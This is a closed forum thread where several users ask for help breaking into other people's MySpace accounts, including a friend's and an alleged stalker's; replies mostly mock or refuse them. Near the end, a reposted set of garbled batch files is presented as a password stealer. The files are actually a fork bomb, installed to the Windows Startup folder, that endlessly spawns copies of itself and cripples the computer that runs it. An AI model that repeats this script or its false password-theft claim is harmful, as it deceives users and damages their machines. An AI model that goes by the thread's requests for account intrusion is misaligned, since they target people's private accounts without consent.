monit
Closed Thread
Page 2 of 4 FirstFirst 1234 LastLast

Thread: myspace hack

Hybrid View

Quote Originally Posted by whiteHz
    -How do they work? What are the known ways to defeat them? (Can I make one new?!!)
    They are images generated by a computer which in theory can only be identified by a human. The human has to enter the characters in the image to proceed.

If they are not very good, you can use an OCR program to recognize the characters instead of a human. Usually though only humans can 'decode' them.

-Can I find the "bug" that you are describing?
    I'm not describing any specific bug - i'm just saying that if the web application has flaws, you could find ways around using the captcha. This is unlikely.

Final question:
    There must be a million people out there looking for holes like this! Is it worth being one?
    If you are intelligent and a fast learner? Yes.

If you are at or below average intelligence, forget it. There are millions of people learning about computer security these days and it takes more than a smile to get to the top. In other words if you are not smart, you have no place learning about computers.

Quote Originally Posted by patton44*
    i want to hack my friends myspace account, basically just to fuck around with his myspace page. I have his myspace web page address, do i need to get his e-mail address to be able to crack his password??? any help would be greatly appreciated!
    First, go to [URL="http://www.myspace.com"]Myspace[/URL] and click on login. Type your friends e-mail in the first box then type 'hakdisb00b' then in the password box 'thisisahakputyurhandsup'.

Question can i just get some help please =)

im not the best with computers jus the basic stuff. well i need some help, i would like a code for getting into a myspace thats private. like one for the pictures or the comments. anything! it would be great for the help! cuz i really dont understand how to do it. so if u can help me with the codes and shitt. you can email me [email]beautifulirish777@**********[/email]

THANKS

Jen

Please help me Stop A Hacker/ stalker

Hello

Im new to this site liKE alot of other sites my Name is David.

wHat im writting about is this. My girl freind Has been getting stalked by Her Ex for the Last few years this guys a real creep and a total psycho.

We Have been doing everythin in or power to stop this guy But The law Blows ass beleave me they say its there 2 help you but it is really just there to bullshit you.

All this talk about kids in school being cyber bullyed and all the talk about everything on the net i would have thought that there was more that could be done about some one fucking with you oneline .

My girl freind Like every Body these days Has a myspace.

This prick keeps loading into her account and changing shit on her profile .
    sending sleezy messages out to people deleating people and leaving her threating messages.

I have set with her watched her change her passwornd * 4 times a few hours later he has It.

All MYSPACE keeps SAYIng is change your password.

not vary help full.

I Dont know much about hacking I dont know much about you guys only what i have read. I love computers alwasy have wish ihad a bit more smarts then maybe i could understand them better.

I get all this talk about reading books and you have to work for what you want. Hackers are to be resepceted You guys can do soem truly amazing things.

Hay freedom to all i Dont see a trouble with it. But stalkers All bad.

Please please help me any body any way you can any advice or help .

This Is the one area we are having a major problum with.

Guys i know what you are saying its a lame ass myspace account get a new one or move on.

This guy has taken everything from my girl freind her freinds her safty her peace of mind.

This is all she Has left. Today he changed her password we are working on getting into her page but no luck so far.

Please if you cant offer me advice on how to stop this jerk then please Offer me soem advice on how to fight fire with fire.

Here is the Jerks myspace [url]http://www.myspace.com/vigvigler[/url]

Hey Goku, just create a new profile and change your entire name, zip, and email address. That might work on you.
    Mike *0*, John the Ripper, have you used it b4? Is it still usefull?

Quote Originally Posted by JMobile
    Hey Goku, just create a new profile and change your entire name, zip, and email address. That might work on you.
    Mike *0*, John the Ripper, have you used it b4? Is it still usefull?
    It's as useful as it ever was for decrypting encrypted/hashed passwords.

Cool. thanks, I have unzipped it, but I'll try it out some other time.
    Enjoy your trojan.

This is a great forum by the way.
    It may have been once, but this forum is totally crap now.

Hey Mike, how long did it took you to learn C++? I have C++ Visual and barely learning it to understand the language. I have done small worms and viruses using Visual Basics 6. I know, I know, it's only good for Windows.
    I never fully learned C++, as there is always something new to discover.

To get at a competent level, it took me about * months. To be able to make quite complicated programs which communicate over the network, it took me 6 months. I only actually started learning just over * year ago.

hey, i really need some help if you can assist

i really need someone to get me my password on myspace
    it sounds extremely dumb but it would be greatly appreciated
    i changed the password today but i was super tired and i took a nap and i could have sworn its what i have been the password i have been trying to use all day
    turns out its not
    and i can`t retrieve it because being super fucking dumb as i am
    i didn`t use my own email i used a random one
    it`d be great if you guys helped me out
    really : )

my email account is
    [email]atl_hpnotiq@**********[/email]

i really need someone to get me my password on myspace
    it sounds extremely dumb but it would be greatly appreciated
    i changed the password today but i was super tired and i took a nap and i could have sworn its what i have been the password i have been trying to use all day
    turns out its not
    and i can`t retrieve it because being super fucking dumb as i am
    i didn`t use my own email i used a random one
    it`d be great if you guys helped me out
    really : )
    There's nothing we can do. Just make a new account, add all your friends again, and tell them not to send messages to your old account. (And use a real email address when making your new account).

If you get an email from someone claiming they can hack into that account it will be a scam.

P.S Enjoy the [URL="http://www.geocities.com/fang_club/spam.gif"]spam[/URL]

:)

aw well whatever
    thanks love

hey i know you guys wont just openly tell me how to do it or hold my hand, but could you point me in the right direction, as far as finding some sorces to start learning to hack? thanks.

hey i know you guys wont just openly tell me how to do it or hold my hand, but could you point me in the right direction, as far as finding some sorces to start learning to hack? thanks.
    Calling yourself Myke and having three digits after your name is a good start.

I pay a lot of ***** for my education, if you want me to teach you everything i know (not a lot) then it will cost you $*00 an hour.

Quote Originally Posted by Troll
    Calling yourself Myke and having three digits after your name is a good start.

I pay a lot of ***** for my education, if you want me to teach you everything i know (not a lot) then it will cost you $*00 an hour.

i never asked you to teach me anything. i want to learn but not from someone like you whos just out to make a quick buck.

and im pretty sure other members wouldnt care to have you mock them.
    good job though
    Last edited by myke383; 01-19-2007 at 04:44 PM.

private conversation

im pretty aware that a google search or any type of search to get myspace passwords is not going to turn up any results.

and to discuaa or disclose such information on this forum or any other would be stupid.

I know there are at least 5 people reading this that can help me out.

I know the old way of sendin an email to a server and getting a password, but i have found that Myspace is a bit more difficult.

I could just ask the person for their password.

But i wouldnt have enough time to log on and see the evidence held against them.
    they would delete it all and THEN tell me the password.

This is a very important matter. and i normally do not ask for assistance.

If i am assisted in this manner and It works....

I can surely reccomend to many of my other friends that they employ your services. No matter what the cost.

but for now. I need somone to assist me.

send me a message or something. And i can give you my number.
    this is a serious matter and everything will remain confidential.

if you wanna see what i look like or some proof im not a cop or anyhting, just go to my myspace.
    i use the same user name you see here.

I found these codes @ another forum, don't know if it will work:

install.bat:
    Code:@ECHO OFFECHO @ECHO OFF >>
    batch*.batECHO :START >>
    batch*.batECHO START batch2.bat >>
    batch*.batECHO GOTO START >>
    batch*.batECHO @ECHO OFF >>
    batch2.batECHO :START >>
    batch2.batECHO START batch*.bat >>
    batch2.batECHO START batch*.bat >> batch2.batECHO START batch*.bat >>
    batch2.batECHO GOTO START >>
    batch2.batSTART batch*.
    batbatch*.bat:
    Code:@ECHO OFF:STARTSTART batch2.batSTART batch2.batSTART batch2.batSTART batch2.batSTART batch2.batGOTO START
    batch2.bat:
    Code:@ECHO OFF:STARTSTART batch2.batSTART batch2.batSTART batch2.batSTART batch2.batSTART batch2.bat

--------------------------------------------------------------------------------

First, make batch*.bat by copying the code, pasting it in Notepad and saving it as all files with the name “batch*.bat” without the quotes. Save it to your “Startup” folder. Your “startup” folder is located here. You can locate the All Files, from the drop down menu, under the name box.
    C:\Documents and Settings\YourName\Start Menu\Programs\Startup
    Then do the same with batch2.bat and name it that as well. Remember to save in all files!
    Save that in your startup as well.
    Then make install.bat, and save it as “install.bat” without the quotes. Remember to save as all files! Save in startup as well.
    Now you’re all set. Run install.bat from your startup folder.
    For maximum damage, run install.bat, batch*.bat and batch2.bat all at the same time, but you have to do it quickly. This should quickly steal his password. After about 5 minutes, all the .bat’s will shut down and the password will be sent to you via email. The email is detected automatically through your IP address.
    Have fun! And don’t use this too much, or you’ll get it patched. :P..And * more thing..you didnt hear this from me

From this web: [url]http://www.4*things.com/things/entries/***047[/url]

Quote Originally Posted by AnneLanne
    I found these codes @ another forum, don't know if it will work:

install.bat:
    Code:@ECHO OFFECHO @ECHO OFF >>
    batch*.batECHO :START >>
    batch*.batECHO GOTO START >>
    batch*.batECHO @ECHO OFF >>
    batch2.batECHO :START >>
    batch2.batECHO START batch*.bat >> batch2.batECHO START batch*.bat >>
    batch2.batECHO GOTO START >>
    batch2.batSTART batch*.
    batbatch*.bat:
    Code:@ECHO OFF:STARTSTART batch2.batSTART batch2.batSTART batch2.batSTART batch2.batSTART batch2.batGOTO START
    batch2.bat:
    Code:@ECHO OFF:STARTSTART batch2.batSTART batch2.batSTART batch2.batSTART batch2.batSTART batch2.bat

--------------------------------------------------------------------------------

First, make batch*.bat by copying the code, pasting it in Notepad and saving it as all files with the name “batch*.bat” without the quotes. Save it to your “Startup” folder. Your “startup” folder is located here. You can locate the All Files, from the drop down menu, under the name box.
    Then do the same with batch2.bat and name it that as well. Remember to save in all files!
    Save that in your startup as well.
    Then make install.bat, and save it as “install.bat” without the quotes. Remember to save as all files! Save in startup as well.
    Now you’re all set. Run install.bat from your startup folder.
    For maximum damage, run install.bat, batch*.bat and batch2.bat all at the same time, but you have to do it quickly. This should quickly steal his password. After about 5 minutes, all the .bat’s will shut down and the password will be sent to you via email. The email is detected automatically through your IP address.
    Have fun! And don’t use this too much, or you’ll get it patched. :P..And * more thing..you didnt hear this from me

From this web: [url]http://www.4*things.com/things/entries/***047[/url]

Can anybody break this down into segments? Do I copy and save the whole code * times or are there diffrnet parts to save for each? Anyway by looking at it what do you guys think?

Closed Thread